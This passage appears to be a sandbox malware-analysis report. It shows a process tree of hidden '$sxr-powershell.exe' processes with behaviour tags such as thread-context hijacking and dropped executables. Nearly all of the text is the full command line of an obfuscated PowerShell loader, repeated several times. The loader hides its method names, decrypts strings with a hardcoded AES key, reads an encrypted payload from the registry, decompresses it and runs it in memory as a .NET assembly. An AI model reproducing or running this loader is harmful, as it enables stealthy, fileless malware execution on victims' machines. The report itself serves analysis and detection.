'')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        9⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Checks computer location settings
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious use of SetWindowsHookEx
        
        PID:3536
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3536).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        10⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:6672
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3536).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        10⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:6680
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3536).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        10⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5372
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3536).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, 